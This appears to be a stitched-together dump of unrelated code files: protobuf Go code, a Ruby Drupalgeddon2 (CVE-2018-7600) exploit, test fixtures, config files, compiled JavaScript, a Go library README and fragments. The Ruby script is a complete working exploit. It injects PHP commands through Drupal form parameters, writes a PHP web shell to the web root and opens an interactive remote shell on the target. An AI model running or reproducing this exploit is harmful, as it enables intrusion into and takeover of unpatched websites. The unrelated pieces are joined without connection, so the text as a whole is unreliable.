{\n\treturn xxx_messageInfo_Any.Size(m)\n}\nfunc (m *Any) XXX_DiscardUnknown() {\n\txxx_messageInfo_Any.DiscardUnknown(m)\n}\n\nvar xxx_messageInfo_Any proto.InternalMessageInfo\n\nfunc (m *Any) GetTypeUrl() string {\n\tif m != nil {\n\t\treturn m.TypeUrl\n\t}\n\treturn \"\"\n}\n\nfunc (m *Any) GetValue() []byte {\n\tif m != nil {\n\t\treturn m.Value\n\t}\n\treturn nil\n}\n\nfunc init() {\n\tproto.RegisterType((*Any)(nil), \"google.protobuf.Any\")\n}\n\nfunc init() { proto.RegisterFile(\"google/protobuf/any.proto\", fileDescriptor_any_744b9ca530f228db) }\n\nvar fileDescriptor_any_744b9ca530f228db = []byte{\n\t// 185 bytes of a gzipped FileDescriptorProto\n\t0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xe2, 0x92, 0x4c, 0xcf, 0xcf, 0x4f,\n\t0xcf, 0x49, 0xd5, 0x2f, 0x28, 0xca, 0x2f, 0xc9, 0x4f, 0x2a, 0x4d, 0xd3, 0x4f, 0xcc, 0xab, 0xd4,\n\t0x03, 0x73, 0x84, 0xf8, 0x21, 0x52, 0x7a, 0x30, 0x29, 0x25, 0x33, 0x2e, 0x66, 0xc7, 0xbc, 0x4a,\n\t0x21, 0x49, 0x2e, 0x8e, 0x92, 0xca, 0x82, 0xd4, 0xf8, 0xd2, 0xa2, 0x1c, 0x09, 0x46, 0x05, 0x46,\n\t0x0d, 0xce, 0x20, 0x76, 0x10, 0x3f, 0xb4, 0x28, 0x47, 0x48, 0x84, 0x8b, 0xb5, 0x2c, 0x31, 0xa7,\n\t0x34, 0x55, 0x82, 0x49, 0x81, 0x51, 0x83, 0x27, 0x08, 0xc2, 0x71, 0xca, 0xe7, 0x12, 
0x4e, 0xce,\n\t0xcf, 0xd5, 0x43, 0x33, 0xce, 0x89, 0xc3, 0x31, 0xaf, 0x32, 0x00, 0xc4, 0x09, 0x60, 0x8c, 0x52,\n\t0x4d, 0xcf, 0x2c, 0xc9, 0x28, 0x4d, 0xd2, 0x4b, 0xce, 0xcf, 0xd5, 0x4f, 0xcf, 0xcf, 0x49, 0xcc,\n\t0x4b, 0x47, 0xb8, 0xa8, 0x00, 0x64, 0x7a, 0x31, 0xc8, 0x61, 0x8b, 0x98, 0x98, 0xdd, 0x03, 0x9c,\n\t0x56, 0x31, 0xc9, 0xb9, 0x43, 0x8c, 0x0a, 0x80, 0x2a, 0xd1, 0x0b, 0x4f, 0xcd, 0xc9, 0xf1, 0xce,\n\t0xcb, 0x2f, 0xcf, 0x0b, 0x01, 0x29, 0x4d, 0x62, 0x03, 0xeb, 0x35, 0x06, 0x04, 0x00, 0x00, 0xff,\n\t0xff, 0x13, 0xf8, 0xe8, 0x42, 0xdd, 0x00, 0x00, 0x00,\n}\n"} {"text": "#!/usr/bin/env ruby\n#\n# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/\n#\n# Authors:\n# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked\n# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k\n#\n\n\nrequire 'base64'\nrequire 'json'\nrequire 'net/http'\nrequire 'openssl'\nrequire 'readline'\n\n\n# Settings - Proxy information (nil to disable)\nproxy_addr = nil\nproxy_port = 8080\n\n\n# Settings - General\n$useragent = \"drupalgeddon2\"\nwebshell = \"s.php\"\nwriteshell = true\n\n\n# Settings - Payload (we could just be happy without this, but we can do better!)\n#bashcmd = \"'\nbashcmd = \"&1' ); }\"\nbashcmd = \"echo \" + Base64.strict_encode64(bashcmd) + \" | base64 -d\"\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Function http_post [post]\ndef http_post(url, payload=\"\")\n uri = URI(url)\n request = Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.body = payload\n return $http.request(request)\nend\n\n\n# Function gen_evil_url \ndef gen_evil_url(evil, feedback=true)\n # PHP function to use (don't forget about disabled functions...)\n phpmethod = $drupalverion.start_with?('8')? \"exec\" : \"passthru\"\n\n #puts \"[*] PHP cmd: #{phpmethod}\" if feedback\n puts \"[*] Payload: #{evil}\" if feedback\n\n ## Check the version to match the payload\n # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n if $drupalverion.start_with?('8')\n # Method #1 - Drupal 8, mail, #post_render - response is 200\n url = $target + \"user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpmethod + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)\n #url = $target + \"user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n #payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=\" + evil\n elsif $drupalverion.start_with?('7')\n # Method #3 - Drupal 7, name, #post_render - response is 200\n url = $target + \"?q=user/password&name[%23post_render][]=\" + phpmethod + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n else\n puts \"[!] 
Unsupported Drupal version\"\n exit\n end\n\n # Drupal v7 needs an extra value from a form\n if $drupalverion.start_with?('7')\n response = http_post(url, payload)\n\n form_build_id = response.body.match(/input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\"/).to_s().slice(/value=\"(.*)\"/, 1).to_s.strip\n puts \"[!] WARNING: Didn't detect form_build_id\" if form_build_id.empty?\n\n #url = $target + \"file/ajax/name/%23value/\" + form_build_id\n url = $target + \"?q=file/ajax/name/%23value/\" + form_build_id\n payload = \"form_build_id=\" + form_build_id\n end\n\n return url, payload\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Quick how to use\nif ARGV.empty?\n puts \"Usage: ruby drupalggedon2.rb \"\n puts \" ruby drupalgeddon2.rb https://example.com\"\n exit\nend\n# Read in values\n$target = ARGV[0]\n\n\n# Check input for protocol\nif not $target.start_with?('http')\n $target = \"http://#{$target}\"\nend\n# Check input for the end\nif not $target.end_with?('/')\n $target += \"/\"\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Banner\nputs \"[*] --==[::#Drupalggedon2::]==--\"\nputs \"-\"*80\nputs \"[*] Target : #{$target}\"\nputs \"[*] Write? : Skipping writing web shell\" if not writeshell\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Setup connection\nuri = URI($target)\n$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)\n\n\n# Use SSL/TLS if needed\nif uri.scheme == \"https\"\n $http.use_ssl = true\n $http.verify_mode = OpenSSL::SSL::VERIFY_NONE\nend\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Try and get version\n$drupalverion = nil\n# Possible URLs\nurl = [\n $target + \"CHANGELOG.txt\",\n $target + \"core/CHANGELOG.txt\",\n $target + \"includes/bootstrap.inc\",\n $target + \"core/includes/bootstrap.inc\",\n]\n# Check all\nurl.each do|uri|\n # Check response\n response = http_post(uri)\n\n if response.code == \"200\"\n puts \"[+] Found : #{uri} (#{response.code})\"\n\n # Patched already?\n puts \"[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}\" if response.body.include? \"SA-CORE-2018-002\"\n\n # Try and get version from the file contents\n $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip\n\n # If not, try and get it from the URL\n $drupalverion = uri.match(/core/)? \"8.x\" : \"7.x\" if $drupalverion.empty?\n\n # Done!\n break\n elsif response.code == \"403\"\n puts \"[+] Found : #{uri} (#{response.code})\"\n\n # Get version from URL\n $drupalverion = uri.match(/core/)? \"8.x\" : \"7.x\"\n else\n puts \"[!] MISSING: #{uri} (#{response.code})\"\n end\nend\n\n\n# Feedback\nif $drupalverion\n status = $drupalverion.end_with?('x')? \"?\" : \"!\"\n puts \"[+] Drupal#{status}: #{$drupalverion}\"\nelse\n puts \"[!] Didn't detect Drupal version\"\n puts \"[!] 
Forcing Drupal v8.x attack\"\n $drupalverion = \"8.x\"\nend\nputs \"-\"*80\n\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n\n# Make a request, testing code execution\nputs \"[*] Testing: Code Execution\"\n# Generate a random string to see if we can echo it\nrandom = (0...8).map { (65 + rand(26)).chr }.join\nurl, payload = gen_evil_url(\"echo #{random}\")\nresponse = http_post(url, payload)\nif response.code == \"200\" and not response.body.empty?\n #result = JSON.pretty_generate(JSON[response.body])\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\n puts \"[+] Result : #{result}\"\n\n puts response.body.match(/#{random}/)? \"[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\" : \"[+] Target might to be exploitable?\"\nelse\n puts \"[!] Target is NOT exploitable ~ HTTP Response: #{response.code}\"\n exit\nend\nputs \"-\"*80\n\n\n# Location of web shell & used to signal if using PHP shell\nwebshellpath = nil\nprompt = \"drupalgeddon2\"\n# Possibles paths to try\npaths = [\n \"./\",\n \"./sites/default/\",\n \"./sites/default/files/\",\n]\n# Check all\npaths.each do|path|\n puts \"[*] Testing: File Write To Web Root (#{path})\"\n\n # Merge locations\n webshellpath = \"#{path}#{webshell}\"\n\n # Final command to execute\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\n\n # Generate evil URLs\n url, payload = gen_evil_url(cmd)\n # Make the request\n response = http_post(url, payload)\n # Check result\n if response.code == \"200\" and not response.body.empty?\n # Feedback\n #result = JSON.pretty_generate(JSON[response.body])\n result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0][\"data\"] : response.body\n puts \"[+] Result : #{result}\"\n\n # Test to see if backdoor is there (if we managed to write it)\n response = http_post(\"#{$target}#{webshellpath}\", \"c=hostname\")\n if response.code == \"200\" and not response.body.empty?\n puts \"[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\"\n break\n else\n puts \"[!] Target is NOT exploitable. No write access here!\"\n end\n else\n puts \"[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}\"\n end\n webshellpath = nil\nend if writeshell\nputs \"-\"*80 if writeshell\n\nif webshellpath\n # Get hostname for the prompt\n prompt = response.body.to_s.strip\n\n # Feedback\n puts \"[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'\"\nelsif writeshell\n puts \"[!] FAILED: Coudn't find writeable web path\"\n puts \"[*] Dropping back direct commands (expect an ugly shell!)\"\nend\n\n\n# Stop any CTRL + C action ;)\ntrap(\"INT\", \"SIG_IGN\")\n\n\n# Forever loop\nloop do\n # Default value\n result = \"ERROR\"\n\n # Get input\n command = Readline.readline(\"#{prompt}>> \", true).to_s\n\n # Exit\n break if command =~ /exit/\n\n # Blank link?\n next if command.empty?\n\n # If PHP shell\n if webshellpath\n # Send request\n result = http_post(\"#{$target}#{webshell}\", \"c=#{command}\").body\n # Direct commands\n else\n url, payload = gen_evil_url(command, false)\n response = http_post(url, payload)\n if response.code == \"200\" and not response.body.empty?\n result = $drupalverion.start_with?('8')? 
JSON.parse(response.body)[0][\"data\"] : response.body\n end\n end\n\n # Feedback\n puts result\nend\n"} {"text": "---\nhttp_interactions:\n- request:\n method: get\n uri: http://ps.pndsn.com/v2/auth/audit/sub-key/sub-a-mock-key?auth=key&channel=demo&pnsdk=PubNub-Ruby/4.1.0&signature=zxDcoxKlyAvaeNvZ-W8i5DfEyQd2n_F-xrZtRbBAy4I=×tamp=1464187176&uuid=ruby-test-uuid-client-one\n body:\n encoding: UTF-8\n string: ''\n headers:\n User-Agent:\n - HTTPClient/1.0 (2.8.0, ruby 2.3.0 (2015-12-25))\n Accept:\n - \"*/*\"\n Date:\n - Wed, 25 May 2016 14:39:36 GMT\n response:\n status:\n code: 200\n message: OK\n headers:\n Date:\n - Wed, 25 May 2016 14:39:36 GMT\n Content-Type:\n - text/javascript; charset=UTF-8\n Content-Length:\n - '177'\n Connection:\n - keep-alive\n Access-Control-Allow-Origin:\n - \"*\"\n Access-Control-Allow-Methods:\n - GET\n Access-Control-Allow-Headers:\n - Origin, X-Requested-With, Content-Type, Accept\n Cache-Control:\n - no-cache, no-store, must-revalidate\n body:\n encoding: UTF-8\n string: '{\"message\":\"Success\",\"payload\":{\"level\":\"user\",\"subscribe_key\":\"sub-a-mock-key\",\"channel\":\"demo\",\"auths\":{}},\"service\":\"Access\n Manager\",\"status\":200}'\n http_version: \n recorded_at: Wed, 25 May 2016 14:39:36 GMT\nrecorded_with: VCR 3.0.1\n"} {"text": "\n\n\n\n\tCFBundleDevelopmentRegion\n\ten\n\tCFBundleExecutable\n\t$(EXECUTABLE_NAME)\n\tCFBundleIdentifier\n\torg.reactjs.native.example.$(PRODUCT_NAME:rfc1034identifier)\n\tCFBundleInfoDictionaryVersion\n\t6.0\n\tCFBundleName\n\t$(PRODUCT_NAME)\n\tCFBundlePackageType\n\tAPPL\n\tCFBundleShortVersionString\n\t1.0\n\tCFBundleSignature\n\t????\n\tCFBundleVersion\n\t1\n\tLSRequiresIPhoneOS\n\t\n\tUILaunchStoryboardName\n\tLaunchScreen\n\tUIRequiredDeviceCapabilities\n\t\n\t\tarmv7\n\t\n\tUISupportedInterfaceOrientations\n\t\n\t\tUIInterfaceOrientationPortrait\n\t\tUIInterfaceOrientationLandscapeLeft\n\t\tUIInterfaceOrientationLandscapeRight\n\t\n\tUIViewControllerBasedStatusBarAppearance\n\t\n\tNSLocationWhenInUseUsageDescription\n\t\n\tNSAppTransportSecurity\n\t\n\t\n\t\tNSExceptionDomains\n\t\t\n\t\t\tlocalhost\n\t\t\t\n\t\t\t\tNSExceptionAllowsInsecureHTTPLoads\n\t\t\t\t\n\t\t\t\n\t\t\n\t\n\n\n"} {"text": "fileFormatVersion: 2\nguid: 0c15cb71ab56d4ee484fa0952ffaf36b\ntimeCreated: 1465222832\nlicenseType: Free\nTrueTypeFontImporter:\n serializedVersion: 3\n fontSize: 16\n forceTextureCase: -2\n characterSpacing: 1\n characterPadding: 0\n includeFontData: 1\n fontNames: []\n fallbackFontReferences: []\n customCharacters: \n fontRenderingMode: 0\n ascentCalculationMode: 1\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "/// \nvar __decorate = (this && this.__decorate) || function (decorators, target, key, desc) {\n var c = arguments.length, r = c < 3 ? target : desc === null ? desc = Object.getOwnPropertyDescriptor(target, key) : desc, d;\n if (typeof Reflect === \"object\" && typeof Reflect.decorate === \"function\") r = Reflect.decorate(decorators, target, key, desc);\n else for (var i = decorators.length - 1; i >= 0; i--) if (d = decorators[i]) r = (c < 3 ? d(r) : c > 3 ? 
d(target, key, r) : d(target, key)) || r;\n return c > 3 && r && Object.defineProperty(target, key, r), r;\n};\nvar __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {\n return new (P || (P = Promise))(function (resolve, reject) {\n function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }\n function rejected(value) { try { step(generator[\"throw\"](value)); } catch (e) { reject(e); } }\n function step(result) { result.done ? resolve(result.value) : new P(function (resolve) { resolve(result.value); }).then(fulfilled, rejected); }\n step((generator = generator.apply(thisArg, _arguments || [])).next());\n });\n};\nvar __generator = (this && this.__generator) || function (thisArg, body) {\n var _ = { label: 0, sent: function() { if (t[0] & 1) throw t[1]; return t[1]; }, trys: [], ops: [] }, f, y, t, g;\n return g = { next: verb(0), \"throw\": verb(1), \"return\": verb(2) }, typeof Symbol === \"function\" && (g[Symbol.iterator] = function() { return this; }), g;\n function verb(n) { return function (v) { return step([n, v]); }; }\n function step(op) {\n if (f) throw new TypeError(\"Generator is already executing.\");\n while (_) try {\n if (f = 1, y && (t = y[op[0] & 2 ? \"return\" : op[0] ? \"throw\" : \"next\"]) && !(t = t.call(y, op[1])).done) return t;\n if (y = 0, t) op = [0, t.value];\n switch (op[0]) {\n case 0: case 1: t = op; break;\n case 4: _.label++; return { value: op[1], done: false };\n case 5: _.label++; y = op[1]; op = [0]; continue;\n case 7: op = _.ops.pop(); _.trys.pop(); continue;\n default:\n if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) { _ = 0; continue; }\n if (op[0] === 3 && (!t || (op[1] > t[0] && op[1] < t[3]))) { _.label = op[1]; break; }\n if (op[0] === 6 && _.label < t[1]) { _.label = t[1]; t = op; break; }\n if (t && _.label < t[2]) { _.label = t[2]; _.ops.push(op); break; }\n if (t[2]) _.ops.pop();\n _.trys.pop(); continue;\n }\n op = body.call(thisArg, _);\n } catch (e) { op = [6, e]; y = 0; } finally { f = t = 0; }\n if (op[0] & 5) throw op[1]; return { value: op[0] ? 
op[1] : void 0, done: true };\n }\n};\nvar utils = require(\"../lib/utils\");\n// import fileUtil = require('../lib/FileUtil');\nvar watch = require(\"../lib/watch\");\nvar path = require(\"path\");\nvar Build = require(\"./build\");\nvar Server = require(\"../server/server\");\nvar FileUtil = require(\"../lib/FileUtil\");\nvar service = require(\"../service/index\");\nvar os = require(\"os\");\nvar Run = /** @class */ (function () {\n function Run() {\n this.initVersion = \"\"; //初始化的 egret 版本,如果版本变化了,关掉当前的进程\n }\n Run.prototype.execute = function () {\n return __awaiter(this, void 0, void 0, function () {\n var exitCode, target, _a, port;\n return __generator(this, function (_b) {\n switch (_b.label) {\n case 0: return [4 /*yield*/, new Build().execute()];\n case 1:\n exitCode = _b.sent();\n target = egret.args.target;\n _a = target;\n switch (_a) {\n case \"web\": return [3 /*break*/, 2];\n case \"wxgame\": return [3 /*break*/, 4];\n case 'bricks': return [3 /*break*/, 6];\n }\n return [3 /*break*/, 8];\n case 2: return [4 /*yield*/, utils.getAvailablePort(egret.args.port)];\n case 3:\n port = _b.sent();\n this.initServer(port);\n return [2 /*return*/, DontExitCode];\n case 4: return [4 /*yield*/, runWxIde()];\n case 5: return [2 /*return*/, (_b.sent())];\n case 6: return [4 /*yield*/, runBricks()];\n case 7: return [2 /*return*/, (_b.sent())];\n case 8: return [2 /*return*/];\n }\n });\n });\n };\n Run.prototype.initServer = function (port) {\n egret.args.port = port;\n var addresses = utils.getNetworkAddress();\n if (addresses.length > 0) {\n egret.args.host = addresses[0];\n }\n var openWithBrowser = !egret.args.serverOnly;\n var server = new Server();\n var projectDir = egret.args.projectDir;\n server.use(Server.fileReader(projectDir));\n server.start(projectDir, port, this.wrapByParams(egret.args.startUrl), openWithBrowser);\n if (egret.args.serverOnly) {\n console.log(\"Url:\" + this.wrapByParams(egret.args.startUrl));\n }\n else {\n console.log('\\n');\n console.log(\" \" + utils.tr(10013, ''));\n console.log('\\n');\n console.log(' ' + this.wrapByParams(egret.args.startUrl));\n for (var i = 1; i < addresses.length; i++) {\n console.log(' ' + this.wrapByParams(egret.args.getStartURL(addresses[i])));\n }\n console.log('\\n');\n }\n if (egret.args.autoCompile) {\n console.log(' ' + utils.tr(10010));\n this.watchFiles(egret.args.srcDir);\n //this.watchFiles(egret.args.templateDir);\n }\n else if (!egret.args.serverOnly) {\n console.log(' ' + utils.tr(10012));\n }\n };\n Run.prototype.watchFiles = function (dir) {\n var _this = this;\n watch.createMonitor(dir, { persistent: true, interval: 2007, filter: function (f, stat) { return !f.match(/\\.g(\\.d)?\\.ts/); } }, function (m) {\n m.on(\"created\", function (f) { return _this.sendBuildCMD(f, \"added\"); })\n .on(\"removed\", function (f) { return _this.sendBuildCMD(f, \"removed\"); })\n .on(\"changed\", function (f) { return _this.sendBuildCMD(f, \"modified\"); });\n });\n watch.createMonitor(path.dirname(dir), {\n persistent: true, interval: 2007, filter: function (f, stat) {\n if (path.basename(f) == \"egretProperties.json\" || path.basename(f) == \"tsconfig.json\") {\n return true;\n }\n else {\n return false;\n }\n }\n }, function (m) {\n m.on(\"created\", function (f) { return _this.shutDown(f, \"added\"); })\n .on(\"removed\", function (f) { return _this.shutDown(f, \"removed\"); })\n .on(\"changed\", function (f) { return _this.shutDown(f, \"modified\"); });\n });\n };\n Run.prototype.shutDown = function (file, type) {\n 
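// a watched config file (egretProperties.json / tsconfig.json) changed: log it, ask the build service to shut down, then exit so the next run reloads the new settings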
globals.log(10022, file);\n service.client.execCommand({\n path: egret.args.projectDir,\n command: \"shutdown\",\n option: egret.args\n }, function () { return process.exit(0); }, true);\n };\n Run.prototype.sendBuildCMD = function (file, type) {\n file = FileUtil.escapePath(file);\n egret.args[type] = [file];\n service.client.execCommand({ command: \"build\", path: egret.args.projectDir, option: egret.args }, function (cmd) {\n if (!cmd.exitCode)\n console.log(' ' + utils.tr(10011));\n else\n console.log(' ' + utils.tr(10014), cmd.exitCode);\n if (cmd.messages) {\n cmd.messages.forEach(function (m) { return console.log(m); });\n }\n });\n };\n Run.prototype.wrapByParams = function (url) {\n return url + this.genParams();\n };\n Run.prototype.genParams = function () {\n var result = \"\";\n var propertyFilePath = FileUtil.joinPath(egret.args.projectDir, \"egretProperties.json\");\n if (FileUtil.exists(propertyFilePath)) {\n var urlParams = JSON.parse(FileUtil.read(propertyFilePath)).urlParams;\n if (urlParams) {\n var hasParams = false;\n for (var key in urlParams) {\n hasParams = true;\n result += key + \"=\" + urlParams[key] + \"&\";\n }\n if (hasParams) {\n result = \"?\" + result.substr(0, result.length - 1);\n }\n }\n }\n return result;\n };\n __decorate([\n utils.cache\n ], Run.prototype, \"genParams\", null);\n return Run;\n}());\nfunction runWxIde() {\n return __awaiter(this, void 0, void 0, function () {\n var wxPaths, _a, result, stdout_1, iconv, encoding, binaryEncoding, result2, stdout, stdoutArr, exePath, wxpath, projectPath, e_1;\n return __generator(this, function (_b) {\n switch (_b.label) {\n case 0:\n wxPaths = [];\n _a = os.platform();\n switch (_a) {\n case \"darwin\": return [3 /*break*/, 1];\n case \"win32\": return [3 /*break*/, 3];\n }\n return [3 /*break*/, 5];\n case 1: return [4 /*yield*/, utils.executeCommand(\"defaults read com.tencent.wechat.devtools LastRunAppBundlePath\")];\n case 2:\n result = _b.sent();\n if (result.stdout != '') {\n stdout_1 = result.stdout.replace(/\\n/g, \"\");\n wxPaths = [FileUtil.joinPath(stdout_1, \"/Contents/Resources/app.nw/bin/cli\")];\n }\n // defaults read\n wxPaths.push(\"/Applications/wechatwebdevtools.app/Contents/Resources/app.nw/bin/cli\");\n return [3 /*break*/, 5];\n case 3:\n // defaults read\n wxPaths = [\n \"C:\\\\Program Files (x86)\\\\Tencent\\\\微信web开发者工具\\\\cli.bat\",\n \"C:\\\\Program Files\\\\Tencent\\\\微信web开发者工具\\\\cli.bat\"\n ];\n iconv = require('../lib/iconv-lite');\n encoding = 'cp936';\n binaryEncoding = 'binary';\n return [4 /*yield*/, utils.executeCommand('REG QUERY \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Tencent\\\\微信web开发者工具\"', { encoding: binaryEncoding })];\n case 4:\n result2 = _b.sent();\n stdout = iconv.decode(new Buffer(result2.stdout, binaryEncoding), encoding);\n if (stdout != '') {\n stdoutArr = stdout.split(\"\\r\\n\");\n exePath = stdoutArr.find(function (path) { return path.indexOf(\".exe\") != -1; });\n exePath = exePath.split(\" \").find(function (path) { return path.indexOf(\".exe\") != -1; });\n exePath = path.join(path.dirname(exePath), 'cli.bat');\n wxPaths.unshift(exePath);\n }\n return [3 /*break*/, 5];\n case 5:\n wxpath = wxPaths.find(function (wxpath) { return FileUtil.exists(wxpath); });\n if (!wxpath) return [3 /*break*/, 11];\n projectPath = egret.args.projectDir;\n projectPath = path.resolve(projectPath, \"../\", path.basename(projectPath) + \"_wxgame\");\n _b.label = 6;\n case 6:\n _b.trys.push([6, 8, , 10]);\n return [4 /*yield*/, utils.shell(wxpath, [\"-o\", projectPath, 
\"-f\", \"egret\"], null, true)];\n case 7:\n _b.sent();\n return [3 /*break*/, 10];\n case 8:\n e_1 = _b.sent();\n return [4 /*yield*/, utils.shell(wxpath, [\"-o\", projectPath], null, true)];\n case 9:\n _b.sent();\n return [3 /*break*/, 10];\n case 10: return [3 /*break*/, 12];\n case 11: throw '请安装最新微信开发者工具';\n case 12: return [2 /*return*/, DontExitCode];\n }\n });\n });\n}\nfunction runBricks() {\n return __awaiter(this, void 0, void 0, function () {\n var projectPath;\n return __generator(this, function (_a) {\n switch (os.platform()) {\n case \"darwin\":\n projectPath = egret.args.projectDir;\n projectPath = path.resolve(projectPath, \"../\", path.basename(projectPath) + \"_bricks\", \"PublicBrickEngineGame.xcodeproj\");\n utils.open(projectPath);\n return [2 /*return*/, 0];\n break;\n case \"win32\":\n throw '目前玩一玩仅支持 MacOS 平台开发';\n break;\n }\n return [2 /*return*/, 1];\n });\n });\n}\nmodule.exports = Run;\n"} {"text": "/*\nCopyright 2017 The Kubernetes Authors.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n*/\n\npackage v1beta1\n\nimport \"k8s.io/apimachinery/pkg/runtime\"\n\nfunc addDefaultingFuncs(scheme *runtime.Scheme) error {\n\tRegisterDefaults(scheme)\n\treturn scheme.AddDefaultingFuncs(\n\t\tSetDefaults_CertificateSigningRequestSpec,\n\t)\n}\nfunc SetDefaults_CertificateSigningRequestSpec(obj *CertificateSigningRequestSpec) {\n\tif obj.Usages == nil {\n\t\tobj.Usages = []KeyUsage{UsageDigitalSignature, UsageKeyEncipherment}\n\t}\n}\n"} {"text": "cli\n===\n\n[![Build Status](https://travis-ci.org/urfave/cli.svg?branch=master)](https://travis-ci.org/urfave/cli)\n[![Windows Build Status](https://ci.appveyor.com/api/projects/status/rtgk5xufi932pb2v?svg=true)](https://ci.appveyor.com/project/urfave/cli)\n\n[![GoDoc](https://godoc.org/github.com/urfave/cli?status.svg)](https://godoc.org/github.com/urfave/cli)\n[![codebeat](https://codebeat.co/badges/0a8f30aa-f975-404b-b878-5fab3ae1cc5f)](https://codebeat.co/projects/github-com-urfave-cli)\n[![Go Report Card](https://goreportcard.com/badge/urfave/cli)](https://goreportcard.com/report/urfave/cli)\n[![codecov](https://codecov.io/gh/urfave/cli/branch/master/graph/badge.svg)](https://codecov.io/gh/urfave/cli)\n\ncli is a simple, fast, and fun package for building command line apps in Go. The\ngoal is to enable developers to write fast and distributable command line\napplications in an expressive way.\n\n## Usage Documentation\n\nUsage documentation exists for each major version\n\n- `v1` - [./docs/v1/manual.md](./docs/v1/manual.md)\n- `v2` - 🚧 documentation for `v2` is WIP 🚧\n\n## Installation\n\nMake sure you have a working Go environment. Go version 1.10+ is supported. 
[See\nthe install instructions for Go](http://golang.org/doc/install.html).\n\n### GOPATH\n\nMake sure your `PATH` includes the `$GOPATH/bin` directory so your commands can\nbe easily used:\n```\nexport PATH=$PATH:$GOPATH/bin\n```\n\n### Supported platforms\n\ncli is tested against multiple versions of Go on Linux, and against the latest\nreleased version of Go on OS X and Windows. For full details, see\n[`./.travis.yml`](./.travis.yml) and [`./appveyor.yml`](./appveyor.yml).\n\n### Using `v1` releases\n\n```\n$ go get github.com/urfave/cli\n```\n\n```go\n...\nimport (\n \"github.com/urfave/cli\"\n)\n...\n```\n\n### Using `v2` releases\n\n**Warning**: `v2` is in a pre-release state.\n\n```\n$ go get github.com/urfave/cli.v2\n```\n\n```go\n...\nimport (\n \"github.com/urfave/cli.v2\" // imports as package \"cli\"\n)\n...\n```\n"} {"text": "\n\n

Analysis of Condor Downloads

Analysis of Older Condor Releases

[graphs of Condor download statistics (images not recoverable)]
\n\n\n"} {"text": "/*\n This file is part of Darling.\n\n Copyright (C) 2019 Lubos Dolezel\n\n Darling is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Darling is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Darling. If not, see .\n*/\n\n#import \n\n@implementation MKMultiPoint\n\n- (NSMethodSignature *)methodSignatureForSelector:(SEL)aSelector\n{\n return [NSMethodSignature signatureWithObjCTypes: \"v@:\"];\n}\n\n- (void)forwardInvocation:(NSInvocation *)anInvocation\n{\n NSLog(@\"Stub called: %@ in %@\", NSStringFromSelector([anInvocation selector]), [self class]);\n}\n\n@end\n"} {"text": "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"} {"text": "# Copyright:\tPublic domain.\n# Filename:\tMakefile\n# Purpose:\tMakefile for Colossus 1A, Build 249.\n#\t\t(The source code for the Command Module's (CM)\n#\t\tApollo Guidance Computer (AGC), maybe for Apollo 8 and/or 